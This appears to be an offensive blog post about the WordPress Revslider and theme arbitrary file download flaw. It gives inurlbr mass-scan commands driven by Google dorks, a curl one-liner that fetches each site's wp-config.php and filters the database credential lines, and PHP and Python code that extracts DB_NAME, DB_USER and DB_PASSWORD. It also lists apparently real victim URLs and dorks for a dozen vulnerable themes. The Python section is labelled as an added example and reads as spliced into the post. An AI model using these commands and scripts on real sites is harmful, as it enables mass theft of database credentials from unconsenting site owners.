 --comand-vul Run this command for every URL found to be vulnerable.
     Example: --comand-vul {command}
     Usage:   --comand-vul 'nmap -sV -p 22,80,21 _TARGET_'
              --comand-vul './exploit.sh _TARGET_ output.txt'
 --comand-all Run a single command for EVERY URL found, vulnerable or not.
     Example: --comand-all {command}
     Usage:   --comand-all 'nmap -sV -p 22,80,21 _TARGET_'
              --comand-all './exploit.sh _TARGET_ output.txt'
    Observation:
    _TARGET_ is replaced by the URL/target found; when there is no GET
    string to pass along, only the domain part is substituted.
    _TARGETFULL_ is replaced by the original URL/target exactly as found.

-------------------------------------------------------------------------------------------

INURLBR ADVANCED CONTROL

The same scan in a single command: --exploit-get appends the traversal path to each result for validation, --exploit-comand supplies the string substituted for _EXPLOIT_ in the external command, and --comand-all then fetches the full URL with curl and keeps only the DB_ lines of the leaked wp-config.php:

php inurlbr.php --dork 'your dork revslider' -q 1,6 -s wordpress2.txt --exploit-get '/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php' -t 3 --exploit-comand '/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php' --comand-all 'echo "_TARGET__EXPLOIT_">> curlwordpress.txt;curl "_TARGET__EXPLOIT_"|grep "DB_" >> curlwordpress.txt;curl "_TARGET__EXPLOIT_"|grep "DB_"'



Video tutorials (embedded in the original post):
[TUTORIAL] - Wordpress A.F.D Verification/ INURL - BRASIL + SCANNER INURLBR
[TUTORIAL] - Hacking the WordPress panel - Slider Revolution
[TUTORIAL] - Getting access to the WordPress panel


REF:
http://pastebin.com/cGpxRQCs
http://blog.inurl.com.br/2015/01/arbitrary-file-download-vulnerability.html
http://blog.inurl.com.br/2015/01/wordpress-themes-downloadphp-file.html
http://blog.inurl.com.br/2014/08/wordpress-plugin-kenburner-slider-lfd.html
https://github.com/googleinurl/SCANNER-INURLBR#---definindo-comando-externo

Sunday, 18 January 2015

Arbitrary File Download vulnerability in the WordPress Bretheon theme


Arbitrary File Download vulnerability, which I call A.F.D.
This flaw was found in the Bretheon WordPress theme.
--------------------------------------------------------------------------------------------------------------


DETAILS
Access: http://1337day.com/exploit/23140
Exploit Title: Wordpress Theme Bretheon Arbitrary File Download Vulnerability
Date: 17/01/2014
Exploit Author: MindCracker - Team MaDLeeTs
Contact : [email protected] - [email protected]| https://twitter.com/MindCrackerKhan 
Tested on: Linux / Windows

Google Dork: inurl:wp-content/themes/bretheon/
Demo

http://infiniteloopcorp.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
http://scottysgym.com.au/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
http://vladlogistik.ru/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
http://transinfo.nnov.ru/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

 PoC

http://target/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
--------------------------------------------------------------------------------------------------------------

Since this flaw in the theme uses nothing new and relies on the standard path "admin-ajax.php?action=revslider_show_image&img=", our exploit developed months ago already performs this check and can be used as is.
--------------------------------------------------------------------------------------------------------------

[TUTORIAL]: 

https://www.youtube.com/watch?v=w6pxPR_s05w

TUTORIAL DETAILS:
http://blog.inurl.com.br/2015/01/wordpress-themes-downloadphp-file.html

EXECUTE:
php exploit.php www.target.gov.us
--------------------------------------------------------------------------------------------------------------

[EXPLOIT]: Wordpress A.F.D Verification/ INURL - BRASIL


http://pastebin.com/ZEnbxXXd
http://packetstormsecurity.com/files/129706/WordPress-Themes-download.php-File-Disclosure.html
--------------------------------------------------------------------------------------------------------------

Friday, 2 January 2015

Wordpress A.F.D Verification/ INURL - BRASIL - WORDPRESS THEMES DOWNLOAD.PHP FILE DISCLOSURE


Multiple WordPress themes suffer from an arbitrary file download vulnerability in download.php. These include Ultimatum, Medicate, Centum, Avada, Striking Theme & E-Commerce, cuckootap, IncredibleWP, Trinity, Lote27, and themes bundling Revslider.



------------------------------------------------------------------------------
# *NAME*:               Wordpress A.F.D Verification/ INURL - BRASIL
# *TYPE*:               Arbitrary File Download
# *Tested on*:          Linux
# *EXECUTE*:            php exploit.php www.target.gov.us
# *OUTPUT*:             WORDPRES_A_F_D.txt
# *AUTHOR*:             GoogleINURL
# *EMAIL*:              [email protected]
# *Blog*:               http://blog.inurl.com.br
# *Twitter*:            https://twitter.com/googleinurl
# *Fanpage*:            https://fb.com/InurlBrasil
# *GIT*:                https://github.com/googleinurl
# *YOUTUBE*:            https://www.youtube.com/channel/UCFP-WEzs5Ikdqw0HBLImGGA
# *PACKETSTORMSECURITY*: http://packetstormsecurity.com/user/googleinurl/
#
------------------------------------------------------------------------------
#  Command Exec Scanner INURLBR:
#
# ./inurlbr.php --dork 'inurl:/wp-content/themes/' -q 1,6 -s save.txt --comand-all "php exploit.php _TARGET_"
#
------------------------------------------------------------------------------
#
# Download Scanner INURLBR:
# https://github.com/googleinurl/SCANNER-INURLBR
#
------------------------------------------------------------------------------

Description:

This exploit lets the attacker test for the Arbitrary File Download flaw
in dozens of WordPress themes.
For each target URL the script requests the vulnerable path and then runs
regular expressions over the response body to confirm that wp-config.php
came back and to pull out the database settings. The parentheses are the
PCRE delimiters, so each pattern is DB_xxx followed by everything up to
the last single quote on that line:
preg_match_all("(DB_NAME.*')", $body, $status['DB_NAME']);
preg_match_all("(DB_USER.*')", $body, $status['DB_USER']);
preg_match_all("(DB_PASSWORD.*')", $body, $status['DB_PASSWORD']);
preg_match_all("(DB_HOST.*')", $body, $status['DB_HOST']);
preg_match_all("(DB_CHARSET.*')", $body, $status['DB_CHARSET']);
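The same verification step, as an added example in Python rather than the page's exploit.php: given only the HTTP body returned for the revslider_show_image request, decide whether wp-config.php actually leaked and extract the DB_* constants. It also handles the two common non-hits the PHP regexes would skip over silently: WordPress answers a bare "0" from admin-ajax.php when the action is not registered (plugin absent or patched), and an HTML page that merely mentions "DB_NAME" must not count as a leak. The three sample bodies and the credentials in them are constructed for the example.

```python
"""Classify an admin-ajax.php response for the arbitrary-file-download check.

Added example, not the INURL exploit. The regex is stricter than the page's
'DB_NAME.*' patterns: it requires a real define() with both arguments.
"""
import re

# define('DB_NAME', 'value');  either quote style, optional whitespace
DEFINE_RE = re.compile(
    r"""define\(\s*['"](DB_[A-Z_]+)['"]\s*,\s*['"]([^'"]*)['"]\s*\)""")

WANTED = ("DB_NAME", "DB_USER", "DB_PASSWORD", "DB_HOST", "DB_CHARSET")


def extract_db_constants(body: str) -> dict:
    """Return the DB_* constants defined in a leaked wp-config.php body."""
    return {name: value for name, value in DEFINE_RE.findall(body)
            if name in WANTED}


def classify_response(body: str) -> str:
    """Label the body of a revslider_show_image request.

    'leak'      - PHP source defining the database credentials came back
    'no-action' - WordPress answered '0': the AJAX action is not registered,
                  so the plugin is absent or patched
    'other'     - anything else (HTML page, WAF block, error page)
    """
    if body.strip() == "0":
        return "no-action"
    found = extract_db_constants(body)
    # Require the credential-bearing constants, not just a stray DB_ string
    if {"DB_NAME", "DB_USER", "DB_PASSWORD"} <= set(found):
        return "leak"
    return "other"


# Constructed sample responses (invented values)
LEAKED_CONFIG = """<?php
/** The name of the database for WordPress */
define('DB_NAME', 'wp_example');
define('DB_USER', 'wp_user');
define("DB_PASSWORD", "s3cret-example");
define('DB_HOST', 'localhost');
define('DB_CHARSET', 'utf8');
$table_prefix = 'wp_';
"""
UNKNOWN_ACTION = "0"
HTML_PAGE = ("<html><body>DB_NAME is mentioned here, but nothing is defined"
             "</body></html>")


if __name__ == "__main__":
    for label, body in (("config", LEAKED_CONFIG),
                        ("unknown action", UNKNOWN_ACTION),
                        ("html", HTML_PAGE)):
        print(label, "->", classify_response(body), extract_db_constants(body))
```

Requiring all three of DB_NAME, DB_USER and DB_PASSWORD before reporting a leak keeps a scan's hit list free of pages that echo the request or contain the strings in prose, which is what a simple grep "DB_" over curl output (as in the advanced inurlbr command above) would still flag.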

DORKS:

WordPress Ultimatum Theme Arbitrary File Download
Vendor Homepage:: http://ultimatumtheme.com/ultimatum-themes/s
Google Dork:: "Index of" & /wp-content/themes/ultimatum

WordPress Centum Theme Arbitrary File Download
Vendor Homepage::
http://themeforest.net/item/centum-responsive-wordpress-theme/3216603
Google Dork:: "Index of" & /wp-content/themes/Centum/

WordPress Avada Theme Arbitrary File Download
Vendor Homepage::
http://themeforest.net/item/avada-responsive-multipurpose-theme/2833226
Google Dork:: "Index of" & /wp-content/themes/Avada/

WordPress Striking Theme & E-Commerce Arbitrary File Download
Vendor Homepage::
http://themeforest.net/item/striking-multiflex-ecommerce-responsive-wp-theme/128763
Google Dork:: "Index of" & /wp-content/themes/striking_r/

WordPress Beach Apollo Arbitrary File Download
Vendor Homepage:: https://www.authenticthemes.com/theme/apollo/
Google Dork:: "Index of" & /wp-content/themes/beach_apollo/

Ajax Store Locator (WordPress plugin) Arbitrary File Download
Vendor Homepage::
http://codecanyon.net/item/ajax-store-locator-wordpress/5293356
Google Dork:: inurl:ajax-store-locator
             index of ajax-store-locator

WordPress cuckootap Theme Arbitrary File Download
Google Dork:: "Index of" & /wp-content/themes/cuckootap/
Vendor Homepage:: http://www.cuckoothemes.com/

WordPress IncredibleWP Theme Arbitrary File Download
Vendor Homepage:: http://freelancewp.com/wordpress-theme/incredible-wp/
Google Dork:: "Index of" & /wp-content/themes/IncredibleWP/

WordPress Medicate Theme Arbitrary File Download
Vendor Homepage::
http://themeforest.net/item/medicate-responsive-medical-and-health-theme/3707916
Google Dork:: "Index of" & /wp-content/themes/medicate/


WordPress Trinity Theme Arbitrary File Download
Vendor Homepage:: https://churchthemes.net/themes/trinity/
Google Dork:: "Index of" & /wp-content/themes/trinity/

WordPress Lote27 Theme Arbitrary File Download
Google Dork:: "Index of" & /wp-content/themes/lote27/

WordPress Revslider (Slider Revolution plugin, bundled with cuckootap and many other premium themes) Arbitrary File Download
Vendor Homepage (cuckootap theme bundle)::
http://themeforest.net/item/cuckootap-one-page-parallax-wp-theme-plus-eshop/3512405
Google Dork:: wp-admin & inurl:revslider_show_image




Exploit::
http://pastebin.com/ZEnbxXXd
http://packetstormsecurity.com/files/129706/WordPress-Themes-download.php-File-Disclosure.html